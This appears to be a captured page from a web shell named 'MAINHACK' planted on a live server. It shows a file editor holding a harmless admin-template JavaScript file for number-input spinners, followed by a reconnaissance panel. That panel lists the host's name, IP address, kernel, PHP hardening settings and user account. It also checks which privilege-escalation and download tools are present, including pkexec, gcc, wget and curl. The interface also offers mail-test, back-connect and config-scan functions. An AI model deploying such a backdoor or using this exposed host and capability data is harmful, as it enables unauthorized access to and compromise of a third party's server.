[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: form-number-input.js
/*========================================================================================= File Name: form-number-input.js Description: Number Input ---------------------------------------------------------------------------------------- Item Name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template Author: PIXINVENT Author URL: http://www.themeforest.net/user/pixinvent ==========================================================================================*/ (function (window, document, $) { 'use strict'; // Default Spin $('.touchspin').TouchSpin({ buttondown_class: 'btn btn-primary', buttonup_class: 'btn btn-primary', buttondown_txt: feather.icons['minus'].toSvg(), buttonup_txt: feather.icons['plus'].toSvg() }); // Icon Change $('.touchspin-icon').TouchSpin({ buttondown_txt: feather.icons['chevron-down'].toSvg(), buttonup_txt: feather.icons['chevron-up'].toSvg() }); // Min - Max var touchspinValue = $('.touchspin-min-max'), counterMin = 17, counterMax = 21; if (touchspinValue.length > 0) { touchspinValue .TouchSpin({ min: counterMin, max: counterMax, buttondown_txt: feather.icons['minus'].toSvg(), buttonup_txt: feather.icons['plus'].toSvg() }) .on('touchspin.on.startdownspin', function () { var $this = $(this); $('.bootstrap-touchspin-up').removeClass('disabled-max-min'); if ($this.val() == counterMin) { $(this).siblings().find('.bootstrap-touchspin-down').addClass('disabled-max-min'); } }) .on('touchspin.on.startupspin', function () { var $this = $(this); $('.bootstrap-touchspin-down').removeClass('disabled-max-min'); if ($this.val() == counterMax) { $(this).siblings().find('.bootstrap-touchspin-up').addClass('disabled-max-min'); } }); } // Step $('.touchspin-step').TouchSpin({ step: 5, buttondown_txt: feather.icons['minus'].toSvg(), buttonup_txt: feather.icons['plus'].toSvg() }); // Color Options $('.touchspin-color').each(function (index) { var down = 'btn btn-primary', up = 'btn btn-primary', $this = $(this); if ($this.data('bts-button-down-class')) { down = $this.data('bts-button-down-class'); } if ($this.data('bts-button-up-class')) { up = $this.data('bts-button-up-class'); } $this.TouchSpin({ mousewheel: false, buttondown_class: down, buttonup_class: up, buttondown_txt: feather.icons['minus'].toSvg(), buttonup_txt: feather.icons['plus'].toSvg() }); }); })(window, document, jQuery);
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.67 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002